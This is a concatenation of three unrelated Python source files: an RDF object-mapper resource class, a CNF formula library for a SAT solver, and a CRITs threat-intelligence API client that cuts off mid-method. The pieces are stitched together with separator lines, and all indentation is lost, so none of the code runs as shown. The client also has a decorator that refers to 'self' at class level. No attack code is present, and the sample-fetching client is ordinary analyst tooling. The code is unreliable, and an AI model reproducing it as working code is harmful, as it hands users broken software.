The first method or :class:`~oldman.attribute.OMAttribute` object matching the requested
`name` is returned. This is why the ordering of models is so important.
:param name: attribute name.
:return: Its value.
"""
for model in self._models:
if name in model.om_attributes:
return model.access_attribute(name).get(self)
method = model.methods.get(name)
if method is not None:
# Make this function be a method (taking self as first parameter)
return partial(method, self)
operation = model.get_operation_by_name(name)
if operation is not None:
return partial(operation, self)
raise AttributeError("%s has no attribute %s" % (self, name))
def __setattr__(self, name, value):
"""Sets the value of one or multiple :class:`~oldman.attribute.OMAttribute` objects.
If multiple :class:`~oldman.attribute.OMAttribute` objects have the same
name, they will all receive the same value.
:param name: attribute name.
:param value: value to assign.
"""
if name in self._special_attribute_names:
self.__dict__[name] = value
return
found = False
for model in self._models:
if name in model.om_attributes:
model.access_attribute(name).set(self, value)
found = True
if not found:
raise AttributeError("%s has not attribute %s" % (self, name))
def add_type(self, additional_type):
"""Declares that the resource is instance of another RDFS class.
Note that it may introduce a new model to the list
and change its ordering.
:param additional_type: IRI or JSON-LD term identifying a RDFS class.
"""
if additional_type not in self._types:
new_types = set(self._types)
new_types.add(additional_type)
self._change_types(new_types)
def check_validity(self):
"""Checks its validity.
Raises an :class:`oldman.exception.OMEditError` exception if invalid.
"""
for model in self._models:
for attr in model.om_attributes.values():
attr.check_validity(self)
def receive_id(self, id):
"""Receives the permanent ID assigned by the store.
Useful when the permanent ID is given by an external server.
Replaces the temporary ID of the resource.
"""
# TODO: make sure the previous id was a temporary one
self._id = id
self._is_new = False
def save(self, is_end_user=True):
"""Saves it into the `data_store` and its `resource_cache`.
Raises an :class:`oldman.exception.OMEditError` exception if invalid.
:param is_end_user: `False` when an authorized user (not a regular end-user)
wants to force some rights. Defaults to `True`.
See :func:`~oldman.attribute.OMAttribute.check_validity` for further details.
:return: The :class:`~oldman.resource.resource.Resource` object itself.
"""
raise NotImplementedError("Have to be implemented by sub-classes")
def delete(self):
"""Removes the resource from the `data_store` and its `resource_cache`.
Cascade deletion is done for related resources satisfying the test
:func:`~oldman.resource.resource.should_delete_resource`.
"""
raise NotImplementedError("Have to be implemented by sub-classes")
def _extract_attribute_list(self):
""":return: An ordered list of list of :class:`~oldman.attribute.OMAttribute` objects."""
attributes = []
for model in self._models:
attributes += model.om_attributes.values()
return attributes
def to_dict(self, remove_none_values=True, include_different_contexts=False,
ignored_iris=None):
"""Serializes the resource into a JSON-like `dict`.
:param remove_none_values: If `True`, `None` values are not inserted into the dict.
Defaults to `True`.
:param include_different_contexts: If `True` local contexts are given to sub-resources.
Defaults to `False`.
:param ignored_iris: List of IRI of resources that should not be included in the `dict`.
Defaults to `set()`.
:return: A `dict` describing the resource.
"""
if ignored_iris is None:
ignored_iris = set()
ignored_iris.add(self._id)
dct = {attr.name: self._convert_value(getattr(self, attr.name), ignored_iris, remove_none_values,
include_different_contexts)
for attr in self._extract_attribute_list()
if not attr.is_write_only}
# filter None values
if remove_none_values:
dct = {k: v for k, v in dct.iteritems() if v is not None}
if not self.is_blank_node():
dct["id"] = self._id
if self._types and len(self._types) > 0:
dct["types"] = list(self._types)
return dct
def to_json(self, remove_none_values=True, ignored_iris=None):
"""Serializes the resource into pure JSON (not JSON-LD).
:param remove_none_values: If `True`, `None` values are not inserted into the dict.
Defaults to `True`.
:param ignored_iris: List of IRI of resources that should not be included in the `dict`.
Defaults to `set()`.
:return: A JSON-encoded string.
"""
return json.dumps(self.to_dict(remove_none_values=remove_none_values,
include_different_contexts=False,
ignored_iris=ignored_iris), sort_keys=True, indent=2)
def to_jsonld(self, remove_none_values=True, include_different_contexts=False,
ignored_iris=None):
"""Serializes the resource into JSON-LD.
:param remove_none_values: If `True`, `None` values are not inserted into the dict.
Defaults to `True`.
:param include_different_contexts: If `True` local contexts are given to sub-resources.
Defaults to `False`.
:param ignored_iris: List of IRI of resources that should not be included in the `dict`.
Defaults to `set()`.
:return: A JSON-LD encoded string.
"""
dct = self.to_dict(remove_none_values=remove_none_values,
include_different_contexts=include_different_contexts,
ignored_iris=ignored_iris)
dct['@context'] = self.context
return json.dumps(dct, sort_keys=True, indent=2)
def to_rdf(self, rdf_format="turtle"):
"""Serializes the resource into RDF.
:param rdf_format: content-type or keyword supported by RDFlib.
Defaults to `"turtle"`.
:return: A string in the chosen RDF format.
"""
g = Graph()
g.parse(data=self.to_json(), context=self.local_context, format="json-ld")
return g.serialize(format=rdf_format)
def __str__(self):
return self._id
def __repr__(self):
return u"%s(<%s>)" % (self.__class__.__name__, self._id)
def _convert_value(self, value, ignored_iris, remove_none_values, include_different_contexts=False):
"""Recursive method. Internals of :func:`~oldman.resource.Resource.to_dict`.
:return: JSON-compatible value or list of JSON-compatible values.
"""
# Containers
if isinstance(value, (list, set, GeneratorType)):
return [self._convert_value(v, ignored_iris, remove_none_values, include_different_contexts)
for v in value]
# Object
if isinstance(value, Resource):
# If non-blank or in the same document
if value.id not in ignored_iris and \
(value.is_blank_node() or self.in_same_document(value)):
value_dict = dict(value.to_dict(remove_none_values, include_different_contexts, ignored_iris))
# TODO: should we improve this test?
if include_different_contexts and value._context != self._context:
value_dict["@context"] = value._context
return value_dict
else:
# URI
return value.id
# Literal
return value
def update(self, full_dict, is_end_user=True, allow_new_type=False, allow_type_removal=False, save=True):
"""Updates the resource from a flat `dict`.
By flat, we mean that sub-resources are only represented by their IRIs:
there is no nested sub-object structure.
This dict is supposed to be exhaustive, so absent value is removed.
Some sub-resources may thus be deleted like if there were a cascade
deletion.
:param full_dict: Flat `dict` containing the attribute values to update.
:param is_end_user: `False` when an authorized user (not a regular end-user)
wants to force some rights. Defaults to `True`.
See :func:`~oldman.attribute.OMAttribute.check_validity` for further details.
:param allow_new_type: If `True`, new types can be added.
Please keep in mind that type change can:
- Modify the behavior of the resource by changing its model list.
- Interfere with the SPARQL requests using instance tests.
If enabled, this may represent a major **security concern**.
Defaults to `False`.
:param allow_type_removal: If `True`, new types can be removed. Same security concerns than above.
Defaults to `False`.
:param save: If `True` calls :func:`~oldman.resource.Resource.save` after updating. Defaults to `True`.
:return: The :class:`~oldman.resource.Resource` object itself.
"""
#if not self.is_blank_node() and "id" not in full_dict:
if "id" not in full_dict:
raise OMWrongResourceError(u"Cannot update an object without IRI")
elif full_dict["id"] != self._id:
raise OMWrongResourceError(u"Wrong IRI %s (%s was expected)" % (full_dict["id"], self._id))
attributes = self._extract_attribute_list()
attr_names = [a.name for a in attributes]
for key in full_dict:
if key not in attr_names and key not in ["@context", "id", "types"]:
raise OMAttributeAccessError(u"%s is not an attribute of %s" % (key, self._id))
# Type change resource
if "types" in full_dict:
try:
new_types = set(full_dict["types"])
except TypeError:
raise OMEditError(u"'types' attribute is not a list, a set or a string but is %s " % new_types)
self._check_and_update_types(new_types, allow_new_type, allow_type_removal)
for attr in attributes:
value = full_dict.get(attr.name)
# set is not a JSON structure (but a JSON-LD one)
if value is not None and attr.container == "@set":
value = set(value)
attr.set(self, value)
if save:
self.save(is_end_user)
return self
def update_from_graph(self, subgraph, initial=False, is_end_user=True, allow_new_type=False,
allow_type_removal=False, save=True):
"""Similar to :func:`~oldman.resource.Resource.full_update` but with
a RDF graph instead of a Python `dict`.
:param subgraph: :class:`rdflib.Graph` object containing the full description of the resource.
:param initial: `True` when the subgraph comes from the `data_graph` and is thus used
to load :class:`~oldman.resource.Resource` object from the triple store.
Defaults to `False`.
:param is_end_user: `False` when an authorized user (not a regular end-user)
wants to force some rights. Defaults to `True`.
See :func:`~oldman.attribute.OMAttribute.check_validity` for further details.
:param allow_new_type: If `True`, new types can be added. Defaults to `False`. See
:func:`~oldman.resource.Resource.full_update` for explanations about the
security concerns.
:param allow_type_removal: If `True`, new types can be removed. Same security concerns than above.
Defaults to `False`.
:param save: If `True` calls :func:`~oldman.resource.Resource.save` after updating. Defaults to `True`.
:return: The :class:`~oldman.resource.Resource` object itself.
"""
for attr in self._extract_attribute_list():
attr.update_from_graph(self, subgraph, initial=initial)
#Types
if not initial:
new_types = {unicode(t) for t in subgraph.objects(URIRef(self._id), RDF.type)}
self._check_and_update_types(new_types, allow_new_type, allow_type_removal)
if save:
self.save(is_end_user)
return self
def get_related_resource(self, id):
""" Not for end-users!
Must be implemented by concrete classes.
If cannot get the resource, return its IRI.
"""
raise NotImplementedError("To be implemented by a concrete sub-class")
def _check_and_update_types(self, new_types, allow_new_type, allow_type_removal):
current_types = set(self._types)
if new_types == current_types:
return
change = False
# Appending new types
additional_types = new_types.difference(current_types)
if len(additional_types) > 0:
if not allow_new_type:
raise OMUnauthorizedTypeChangeError(u"Adding %s to %s has not been allowed"
% (additional_types, self._id))
change = True
# Removal
missing_types = current_types.difference(new_types)
if len(missing_types) > 0:
implicit_types = {t for m in self._models for t in m.ancestry_iris}.difference(
{m.class_iri for m in self._models})
removed_types = missing_types.difference(implicit_types)
if len(removed_types) > 0:
if not allow_type_removal:
raise OMUnauthorizedTypeChangeError(u"Removing %s to %s has not been allowed"
% (removed_types, self._id))
change = True
if change:
self._models, types = self._model_manager.find_models_and_types(new_types)
self._change_types(types)
def _change_types(self, new_types):
self._types = new_types
def _get_om_attribute(self, name):
for model in self._models:
if name in model.om_attributes:
return model.access_attribute(name)
self._logger.debug(u"Models: %s, types: %s" % ([m.name for m in self._models], self._types))
#self._logger.debug(u"%s" % self._manager._registry.model_names)
raise AttributeError(u"%s has not attribute %s" % (self, name))
def _filter_objects_to_delete(self, ids):
raise NotImplementedError("Implemented by a sub-class")
class StoreResource(Resource):
"""StoreResource: resource manipulated by the data store.
End-users should not manipulate it.
Is serializable (pickable).
"""
@classmethod
def load_from_graph(cls, model_manager, data_store, id, subgraph, is_new=True, collection_iri=None):
"""Loads a new :class:`~oldman.resource.StoreResource` object from a sub-graph.
TODO: update the comments.
:param manager: :class:`~oldman.resource.manager.ResourceManager` object.
:param id: IRI of the resource.
:param subgraph: :class:`rdflib.Graph` object containing triples about the resource.
:param is_new: When is `True` and `id` given, checks that the IRI is not already existing in the
`union_graph`. Defaults to `True`.
:return: The :class:`~oldman.resource.Resource` object created.
"""
types = list({unicode(t) for t in subgraph.objects(URIRef(id), RDF.type)})
instance = cls(model_manager, data_store, id=id, types=types, is_new=is_new, collection_iri=collection_iri)
instance.update_from_graph(subgraph, is_end_user=True, save=False, initial=True)
return instance
def __getstate__(self):
"""Pickles this resource."""
state = {name: getattr(self, name) for name in self._pickle_attribute_names}
state["store_name"] = self._store.name
# Reversed order so that important models can overwrite values
reversed_models = self._models
reversed_models.reverse()
for model in reversed_models:
for name, attr in model.om_attributes.iteritems():
value = attr.get_lightly(self)
if isinstance(value, GeneratorType):
if attr.container == "@list":
value = list(value)
else:
value = set(value)
if value is not None:
state[name] = value
return state
def __setstate__(self, state):
"""Unpickles this resource from its serialized `state`."""
required_fields = self._pickle_attribute_names + ["store_name"]
for name in required_fields:
if name not in state:
#TODO: find a better exception (due to the cache)
raise OMInternalError(u"Required field %s is missing in the cached state" % name)
self._id = state["_id"]
self._is_new = state["_is_new"]
self._init_non_persistent_attributes(self._id)
# Store
from oldman.store.datastore import DataStore
self._store = DataStore.get_store(state["store_name"])
self._model_manager = self._store.model_manager
# Models and types
self._models, self._types = self._model_manager.find_models_and_types(state["_types"])
self._former_types = set(self._types)
# Attributes (Python attributes or OMAttributes)
for name, value in state.iteritems():
if name in ["store_name", "_id", "_types", "_is_new"]:
continue
elif name in self._special_attribute_names:
setattr(self, name, value)
# OMAttributes
else:
attribute = self._get_om_attribute(name)
attribute.set(self, value)
# Clears former values (allows modification)
attribute.receive_storage_ack(self)
def get_related_resource(self, id):
""" Gets a related `StoreResource` by calling the datastore directly. """
resource = self.store.get(id=id)
if resource is None:
return id
return resource
def save(self, is_end_user=True):
"""Saves it into the `data_store` and its `resource_cache`.
Raises an :class:`oldman.exception.OMEditError` exception if invalid.
:param is_end_user: `False` when an authorized user (not a regular end-user)
wants to force some rights. Defaults to `True`.
See :func:`~oldman.attribute.OMAttribute.check_validity` for further details.
:return: The :class:`~oldman.resource.resource.Resource` object itself."""
# Checks
attributes = self._extract_attribute_list()
for attr in attributes:
attr.check_validity(self, is_end_user)
# Find objects to delete
objects_to_delete = []
for attr in attributes:
if not attr.has_changed(self):
continue
# Some former objects may be deleted
if attr.om_property.type == OBJECT_PROPERTY:
former_value, value = attr.diff(self)
if isinstance(former_value, dict):
raise NotImplementedError("Object dicts are not yet supported.")
former_value = former_value if isinstance(former_value, (set, list)) else [former_value]
# Cache invalidation (because of possible reverse properties)
resources_to_invalidate = set(value) if isinstance(value, (set, list)) else {value}
resources_to_invalidate.update(former_value)
for r in resources_to_invalidate:
if r is not None:
self._store.resource_cache.remove_resource_from_id(r)
objects_to_delete += self._filter_objects_to_delete(former_value)
# Update literal values
self.store.save(self, attributes, self._former_types)
# Delete the objects
for obj in objects_to_delete:
obj.delete()
# Clears former values
self._former_types = self._types
for attr in attributes:
attr.receive_storage_ack(self)
return self
def delete(self):
"""Removes the resource from the `data_store` and its `resource_cache`.
Cascade deletion is done for related resources satisfying the test
:func:`~oldman.resource.resource.should_delete_resource`.
"""
attributes = self._extract_attribute_list()
for attr in attributes:
# Delete blank nodes recursively
if attr.om_property.type == OBJECT_PROPERTY:
value = getattr(self, attr.name)
if value is not None:
objs = value if isinstance(value, (list, set, GeneratorType)) else [value]
for obj in objs:
if should_delete_resource(obj):
self._logger.debug(u"%s deleted with %s" % (obj.id, self._id))
obj.delete()
else:
self._logger.debug(u"%s not deleted with %s" % (obj.id, self._id))
# Cache invalidation (because of possible reverse properties)
self._store.resource_cache.remove_resource(obj)
setattr(self, attr.name, None)
#Types
self._change_types(set())
self._store.delete(self, attributes, self._former_types)
# Clears former values
for attr in attributes:
attr.receive_storage_ack(self)
self._is_new = False
def _filter_objects_to_delete(self, ids):
return [self.store.get(id=id) for id in ids
if id is not None and is_blank_node(id)]
class ClientResource(Resource):
"""ClientResource: resource manipulated by the end-user.
Has access to the `resource_manager`.
Is not serializable.
"""
def __init__(self, resource_manager, model_manager, store, **kwargs):
Resource.__init__(self, model_manager, store, **kwargs)
self._resource_manager = resource_manager
@classmethod
def load_from_graph(cls, resource_manager, model_manager, data_store, id, subgraph, is_new=True,
collection_iri=None):
"""Loads a new :class:`~oldman.resource.ClientResource` object from a sub-graph.
TODO: update the comments.
:param manager: :class:`~oldman.resource.manager.ResourceManager` object.
:param id: IRI of the resource.
:param subgraph: :class:`rdflib.Graph` object containing triples about the resource.
:param is_new: When is `True` and `id` given, checks that the IRI is not already existing in the
`union_graph`. Defaults to `True`.
:return: The :class:`~oldman.resource.Resource` object created.
"""
types = list({unicode(t) for t in subgraph.objects(URIRef(id), RDF.type)})
instance = cls(resource_manager, model_manager, data_store, id=id, types=types, is_new=is_new,
collection_iri=collection_iri)
instance.update_from_graph(subgraph, is_end_user=True, save=False, initial=True)
return instance
def get_related_resource(self, id):
""" Gets a related `ClientResource` through the resource manager. """
resource = self._resource_manager.get(id=id)
if resource is None:
return id
return resource
def save(self, is_end_user=True):
"""Saves it into the `data_store` and its `resource_cache`.
Raises an :class:`oldman.exception.OMEditError` exception if invalid.
:param is_end_user: `False` when an authorized user (not a regular end-user)
wants to force some rights. Defaults to `True`.
See :func:`~oldman.attribute.OMAttribute.check_validity` for further details.
:return: The :class:`~oldman.resource.resource.Resource` object itself."""
attributes = self._extract_attribute_list()
for attr in attributes:
attr.check_validity(self, is_end_user)
store_resource = self.model_manager.convert_client_resource(self)
store_resource.save(is_end_user)
# Clears former values
self._former_types = self._types
# Clears former values
for attr in attributes:
attr.receive_storage_ack(self)
self._is_new = False
# The ID may be updated (if was a temporary IRI before)
self._id = store_resource.id
return self
def delete(self):
"""Removes the resource from the `data_store` and its `resource_cache`.
Cascade deletion is done for related resources satisfying the test
:func:`~oldman.resource.resource.should_delete_resource`.
"""
store_resource = self.model_manager.convert_client_resource(self)
store_resource.delete()
# Clears former values
self._former_types = self._types
# Clears values
for attr in self._extract_attribute_list():
setattr(self, attr.name, None)
attr.receive_storage_ack(self)
self._is_new = False
def __getstate__(self):
"""Cannot be pickled."""
#TODO: find the appropriate exception
raise Exception("A ClientResource is not serializable.")
def __setstate__(self, state):
"""Cannot be pickled."""
#TODO: find the appropriate exception
raise Exception("A ClientResource is not serializable.")
def _filter_objects_to_delete(self, ids):
"""TODO: consider other cases than blank nodes """
return [self._resource_manager.get(id=id) for id in ids
if id is not None and is_blank_node(id)]
# @property
# def resource_manager(self):
# return self._resource_manager
def is_blank_node(iri):
"""Tests if `id` is a locally skolemized IRI.
External skolemized blank nodes are not considered as blank nodes.
:param iri: IRI of the resource.
:return: `True` if is a blank node.
"""
id_result = urlparse(iri)
return (u"/.well-known/genid/" in id_result.path) and (id_result.hostname == u"localhost")
def should_delete_resource(resource):
"""Tests if a resource should be deleted.
:param resource: :class:`~oldman.resource.Resource` object to evaluate.
:return: `True` if it should be deleted.
"""
#TODO: make sure these blank nodes are not referenced somewhere else
return resource is not None and resource.is_blank_node()
|
|
cnfClass = None
class Variable(object):
def __init__(self, name, inverted=False):
self.name = name
self.inverted = inverted
def __neg__(self):
v = Variable(self.name)
v.inverted = not self.inverted
return v
def __and__(self, other):
c = cnfClass.create_from(self)
return c & other
def __or__(self, other):
c = cnfClass.create_from(self)
return c | other
def __xor__(self, other):
c = cnfClass.create_from(self)
return c ^ other
def __rshift__(self, other): # implies
c = cnfClass.create_from(self)
return -c | other
def __str__(self):
return ("-" if self.inverted else "") + str(self.name)
def __eq__(self, other):
return self.name == other.name and self.inverted == other.inverted
def __hash__(self):
return hash(self.name) ^ hash(self.inverted)
def __cmp__(self, other):
if self == other:
return 0
if (self.name, self.inverted) < (other.name, other.inverted):
return -1
else:
return 1
class NaiveCnf(object):
def __init__(self):
self.dis = []
@classmethod
def create_from(cls, x):
if isinstance(x, Variable):
cnf = NaiveCnf()
cnf.dis = [frozenset([x])]
return cnf
elif isinstance(x, cls):
return x
else:
raise Exception("Could not create a Cnf object from %s" % str(type(x)))
def __and__(self, other):
other = NaiveCnf.create_from(other)
result = NaiveCnf()
result.dis = self.dis + other.dis
return result
def __or__(self, other):
other = NaiveCnf.create_from(other)
if len(self.dis) > 0 and len(other.dis) > 0:
new_dis = []
for d1, d2 in [(d1,d2) for d1 in self.dis for d2 in other.dis]:
d3 = d1 | d2
new_dis.append(d3)
elif len(self.dis) == 0:
new_dis = other.dis
else:
new_dis = self.dis
c = NaiveCnf()
c.dis = new_dis
return c
def __xor__(self, other):
return (self | other) & (-self | -other)
def __neg__(self):
cnfs = []
for d in self.dis:
c = NaiveCnf()
for v in d:
c.dis.append(frozenset([-v]))
cnfs.append(c)
ret = NaiveCnf()
for cnf in cnfs:
ret |= cnf
return ret
def __rshift__(self, other): # implies
return -self | other
def __str__(self):
ret = []
for d in self.dis:
ret.append(" | ".join(map(str,d)))
return "(" + ") & (".join(ret) + ")"
def __eq__(self, other):
return self.dis == other.dis
def __hash__(self):
return hash(self.dis)
def reduceCnf(cnf):
"""
I just found a remarkably large bug in my SAT solver and found an
interesting solution.
Remove all b | -b
(-b | b) & (b | -a) & (-b | a) & (a | -a)
becomes
(b | -a) & (-b | a)
Remove all (-e) & (-e)
(-e | a) & (-e | a) & (-e | a) & (-e | a)
becomes
(-e | a)
(-b | b | c) becomes nothing, not (c)
"""
output = Cnf()
for x in cnf.dis:
dont_add = False
for y in x:
for z in x:
if z == -y:
dont_add = True
break
if dont_add: break
if dont_add: continue
# TODO: Is this necessary anymore? Probably not. Do statistical analysis.
if x not in output.dis:
output.dis.append(x)
return output
#end def reduceCnf(cnf)
class Cnf(object):
def __init__(self):
self.dis = []
@classmethod
def create_from(cls, x):
if isinstance(x, Variable):
cnf = Cnf()
cnf.dis = [frozenset([x])]
return cnf
elif isinstance(x, cls):
return x
else:
raise Exception("Could not create a Cnf object from %s" % str(type(x)))
def __and__(self, other):
other = Cnf.create_from(other)
result = Cnf()
result.dis = self.dis + other.dis
return result
def __or__(self, other):
other = Cnf.create_from(other)
if len(self.dis) > 0 and len(other.dis) > 0:
new_dis = []
for d1, d2 in [(d1,d2) for d1 in self.dis for d2 in other.dis]:
d3 = d1 | d2
if d3 not in new_dis:
new_dis.append(d3)
elif len(self.dis) == 0:
new_dis = other.dis
else:
new_dis = self.dis
c = Cnf()
c.dis = new_dis
return reduceCnf(c)
def __xor__(self, other):
return reduceCnf((self | other) & (-self | -other))
def __neg__(self):
cnfs = []
for d in self.dis:
c = Cnf()
for v in d:
c.dis.append(frozenset([-v]))
x = reduceCnf(c)
if x not in cnfs:
cnfs.append(x)
ret = Cnf()
for cnf in cnfs:
ret |= cnf
return ret
def __rshift__(self, other): # implies
return -self | other
def __str__(self):
ret = []
for d in self.dis:
ret.append(" | ".join(map(str,d)))
return "(" + ") & (".join(ret) + ")"
def __eq__(self, other):
return self.dis == other.dis
def __hash__(self):
return hash(self.dis)
# Change this to NaiveCnf if you want.
cnfClass = Cnf
|
|
import os
import json
import zipfile
import hashlib
import requests
import backoff
from zipfile import ZipFile
from io import BytesIO
class pycritsFetchError(Exception):
def __init__(self, message):
self.message = message
def __str__(self):
return self.message
class pycrits(object):
_API_VERSION = '/api/v1/'
_ACTORS = 'actors/'
_ACTOR_IDENTIFIERS = 'actoridentifiers/'
_CAMPAIGNS = 'campaigns/'
_CERTIFICATES = 'certificates/'
_DOMAINS = 'domains/'
_EMAILS = 'emails/'
_EVENTS = 'events/'
_INDICATORS = 'indicators/'
_IPS = 'ips/'
_PCAPS = 'pcaps/'
_RAW_DATA = 'raw_data/'
_SAMPLES = 'samples/'
_SCREENSHOTS = 'screenshots/'
_TARGETS = 'targets/'
# POST only.
_RELATIONSHIPS = 'relationships/'
# The password for zip files.
_PASSWORD = 'infected'
def __init__(self, host, username, api_key):
self._base_url = host + self._API_VERSION
self._host = host
self._username = username
self._api_key = api_key
self._verify = True
self._retries = 0
@property
def host(self):
return self._host
@host.setter
def host(self, value):
self._host = value
self._base_url = value + self._API_VERSION
@property
def username(self):
return self._username
@username.setter
def username(self, value):
self._username = value
@property
def api_key(self):
return self._api_key
@api_key.setter
def api_key(self, value):
self._api_key = value
@property
def verify(self):
return self._verify
# Verify can take True, False or path to .pem file (to verify the server's cert)
@verify.setter
def verify(self, value):
self._verify = value
@property
def retries(self):
return self._retries
@retries.setter
def retries(self, value):
self._retries = value
@backoff.on_exception(backoff.expo, requests.exceptions.RequestException, max_tries=self._retries)
def post_url(self, url, data, files, verify, proxies):
return requests.post(url, data=data, files=files, verify=verify, proxies=proxies)
@backoff.on_exception(backoff.expo, requests.exceptions.RequestException, max_tries=self._retries)
def get_url(self, url, params, verify, proxies):
return requests.get(url, params=params, verify=verify, proxies=proxies)
# Used for posting.
def _post(self, url, params={}, files=None):
params['username'] = self._username
params['api_key'] = self._api_key
url = self._base_url + url
resp = self.post_url(url, data=params, files=files, verify=self._verify, proxies=None)
if resp.status_code != 200:
raise pycritsFetchError("Response code: %s" % resp.status_code)
try:
results = json.loads(resp.text)
except:
raise pycritsFetchError("Unable to load JSON.")
return results
# Actually do the fetching.
def _do_fetch(self, url, params={}):
resp = self.get_url(url, params=params, verify=self._verify, proxies=None)
if resp.status_code != 200:
raise pycritsFetchError("Response code: %s" % resp.status_code)
try:
results = json.loads(resp.text)
except:
raise pycritsFetchError("Unable to load JSON.")
return results
# Fetch and return once.
def _single_fetch(self, url, params={}):
params['username'] = self._username
params['api_key'] = self._api_key
url = self._base_url + url
return self._do_fetch(url, params=params)
# Fetch and yield a generator. Iterations will continue to fetch.
def _fetch_generator(self, url, total, params={}):
params['username'] = self._username
params['api_key'] = self._api_key
url = self._base_url + url
if total == 0:
yield None
next_ = True
while next_:
results = self._do_fetch(url, params)
for obj in results['objects']:
if total == 0:
raise StopIteration
yield obj
total -= 1
next_ = results['meta']['next']
if next_:
url = self._host + next_
params = {}
def actors(self, params={}, total=-1):
return self._fetch_generator(self._ACTORS, total, params=params)
def actor_identifiers(self, params={}, total=-1):
return self._fetch_generator(self._ACTOR_IDENTIFIERS, total, params=params)
def campaigns(self, params={}, total=-1):
return self._fetch_generator(self._CAMPAIGNS, total, params=params)
def certificates(self, params={}, total=-1):
return self._fetch_generator(self._CERTIFICATES, total, params=params)
def domains(self, params={}, total=-1):
return self._fetch_generator(self._DOMAINS, total, params=params)
def emails(self, params={}, total=-1):
return self._fetch_generator(self._EMAILS, total, params=params)
def events(self, params={}, total=-1):
return self._fetch_generator(self._EVENTS, total, params=params)
def indicators(self, params={}, total=-1):
return self._fetch_generator(self._INDICATORS, total, params=params)
def ips(self, params={}, total=-1):
return self._fetch_generator(self._IPS, total, params=params)
def pcaps(self, params={}, total=-1):
return self._fetch_generator(self._PCAPS, total, params=params)
def raw_datas(self, params={}, total=-1):
return self._fetch_generator(self._RAW_DATA, total, params=params)
def samples(self, params={}, total=-1):
return self._fetch_generator(self._SAMPLES, total, params=params)
def screenshots(self, params={}, total=-1):
return self._fetch_generator(self._SCREENSHOTS, total, params=params)
def targets(self, params={}, total=-1):
return self._fetch_generator(self._TARGETS, total, params=params)
# Fetch a single item given the ID.
def actor(self, id_, params={}):
return self._single_fetch(self._ACTORS + id_ + '/', params)
def actor_identifier(self, id_, params={}):
return self._single_fetch(self._ACTOR_IDENTIFIERS + id_ + '/', params)
def campaign(self, id_, params={}):
return self._single_fetch(self._CAMPAIGNS + id_ + '/', params)
def certificate(self, id_, params={}):
return self._single_fetch(self._CERTIFICATES + id_ + '/', params)
def domain(self, id_, params={}):
return self._single_fetch(self._DOMAINS + id_ + '/', params)
def email(self, id_, params={}):
return self._single_fetch(self._EMAILS + id_ + '/', params)
def event(self, id_, params={}):
return self._single_fetch(self._EVENTS + id_ + '/', params)
def indicator(self, id_, params={}):
return self._single_fetch(self._INDICATORS + id_ + '/', params)
def ip(self, id_, params={}):
return self._single_fetch(self._IPS + id_ + '/', params)
def pcap(self, id_, params={}):
return self._single_fetch(self._PCAPS + id_ + '/', params)
def raw_data(self, id_, params={}):
return self._single_fetch(self._RAW_DATA + id_ + '/', params)
def sample(self, id_, params={}):
return self._single_fetch(self._SAMPLES + id_ + '/', params)
def screenshot(self, id_, params={}):
return self._single_fetch(self._SCREENSHOTS + id_ + '/', params)
def target(self, id_, params={}):
return self._single_fetch(self._TARGETS + id_ + '/', params)
# Fetch a campaign by name.
def campaign_by_name(self, name, params={}):
params['c-name'] = name
results = self._single_fetch(self._CAMPAIGNS, params)
return results['objects']
# Force limit to 1 and only return _id.
def _fetch_count(self, url, params={}):
params['limit'] = 1
params['only'] = 'id'
results = self._single_fetch(url, params)
return results['meta']['total_count']
def indicator_count(self, params={}):
return self._fetch_count(self._INDICATORS, params)
def actor_count(self, params={}):
return self._fetch_count(self._ACTORS, params)
def actor_identifier_count(self, params={}):
return self._fetch_count(self._ACTOR_IDENTIFIERS, params)
def campaign_count(self, params={}):
return self._fetch_count(self._CAMPAIGNS, params)
def certificate_count(self, params={}):
return self._fetch_count(self._CERTIFICATES, params)
def domain_count(self, params={}):
return self._fetch_count(self._DOMAINS, params)
def email_count(self, params={}):
return self._fetch_count(self._EMAILS, params)
def event_count(self, params={}):
return self._fetch_count(self._EVENTS, params)
def indicator_count(self, params={}):
return self._fetch_count(self._INDICATORS, params)
def pcap_count(self, params={}):
return self._fetch_count(self._PCAPS, params)
def raw_data_count(self, params={}):
return self._fetch_count(self._RAW_DATA, params)
def sample_count(self, params={}):
return self._fetch_count(self._SAMPLES, params)
def screenshot_count(self, params={}):
return self._fetch_count(self._SCREENSHOTS, params)
def target_count(self, params={}):
return self._fetch_count(self._TARGETS, params)
def _fetch_binary(self, url, id_=None, params={}):
params['username'] = self._username
params['api_key'] = self._api_key
params['file'] = 1
url = self._base_url + url
if id_:
url += id_ + '/'
resp = self.get_url(url, params=params, verify=self._verify)
if resp.status_code != 200:
raise pycritsFetchError("Response code: %s" % resp.status_code)
return BytesIO(resp.content)
# If not a zip file (ie: "No files found") just return an empty list.
def _unzip_file(self, file_):
results = []
if not zipfile.is_zipfile(file_):
return results
try:
zf = ZipFile(file_, 'r')
filelist = zf.infolist()
for fileentry in filelist:
unzipped_file = zf.open(fileentry, pwd=self._PASSWORD).read()
results.append({'filename': fileentry.filename,
'data': unzipped_file})
except Exception as e:
zf.close()
file_.close()
raise
zf.close()
file_.close()
return results
def fetch_sample(self, md5=None, sha256=None, id_=None, params={}):
if md5:
params['c-md5'] = md5
file_ = self._fetch_binary(self._SAMPLES, params=params)
elif sha256:
params['c-sha256'] = sha256
file_ = self._fetch_binary(self._SAMPLES, params=params)
elif id_:
file_ = self._fetch_binary(self._SAMPLES, id_=id_, params=params)
else:
file_ = self._fetch_binary(self._SAMPLES, params=params)
return self._unzip_file(file_)
def fetch_pcap(self, md5=None, id_=None, params={}):
if md5:
params['c-md5'] = md5
file_ = self._fetch_binary(self._PCAPS, params=params)
elif id_:
file_ = self._fetch_binary(self._PCAPS, id_=id_, params=params)
else:
file_ = self._fetch_binary(self._PCAPS, params=params)
return self._unzip_file(file_)
# Helper to handle file uploads.
# Take either a path to a file on disk or a file object.
# If given both, the filepath will take precedence.
# If we don't have a filename get it from filepath or use
# the md5 of the data from file_obj.
def _get_file_data(self, file_obj, filepath, filename):
if not file_obj and not filepath:
return None
if filepath:
file_obj = open(filepath, 'rb')
if not filename:
# Try to generate it from filepath if we have that.
if filepath:
filename = os.path.basename(filepath)
# If someone does something crazy like filepath='/tmp/'
# then basename() returns ''. Use MD5 in that case.
if not filename:
filename = hashlib.md5(file_obj.read()).hexdigest()
file_obj.seek(0)
return {'filedata': (filename, file_obj)}
# Add objects to CRITs.
def add_actor(self, name, source, params={}):
params['name'] = name
params['source'] = source
return self._post(self._ACTORS, params)
def add_actor_identifier(self, id_type, id_, source, params={}):
params['identifier_type'] = id_type
params['identifier'] = id_
params['source'] = source
